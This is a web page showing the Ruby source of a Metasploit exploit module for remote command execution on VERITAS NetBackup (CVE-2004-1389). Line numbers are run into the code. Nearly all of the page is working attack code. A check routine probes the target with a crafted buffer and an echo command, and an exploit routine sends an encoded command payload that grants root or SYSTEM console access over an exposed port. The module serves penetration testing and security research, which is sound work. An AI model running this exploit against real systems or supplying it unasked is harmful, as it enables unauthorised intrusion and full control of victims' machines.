Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'VERITAS NetBackup Remote Command Execution',13'Description' => %q{14This module allows arbitrary command execution on an15ephemeral port opened by Veritas NetBackup, whilst an16administrator is authenticated. The port is opened and17allows direct console access as root or SYSTEM from18any source address.19},20'Author' => [ 'aushack' ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'CVE', '2004-1389' ],25[ 'OSVDB', '11026' ],26[ 'BID', '11494' ]27],28'Privileged' => true,29'Platform' => %w{ linux unix win },30'Arch' => ARCH_CMD,31'Payload' =>32{33'Space' => 1024,34'BadChars' => '',35'DisableNops' => true,36'Compat' =>37{38'PayloadType' => 'cmd',39'RequiredCmd' => 'generic perl telnet',40}41},42'Targets' =>43[44['Automatic', { }],45],46'DisclosureDate' => '2004-10-21',47'DefaultTarget' => 0))48end4950def check51connect5253sploit = rand_text_alphanumeric(10)54buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"5556sock.put(buf)57banner = sock.get_once5859disconnect6061if banner.to_s.index(sploit)62return Exploit::CheckCode::Vulnerable63end64return Exploit::CheckCode::Safe65end6667def exploit68connect6970sploit = payload.encoded.split(" ")7172buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"73buf << payload.encoded74buf << "\n"7576sock.put(buf)77res = sock.get_once7879print_status(res.to_s)8081handler82disconnect83end84end858687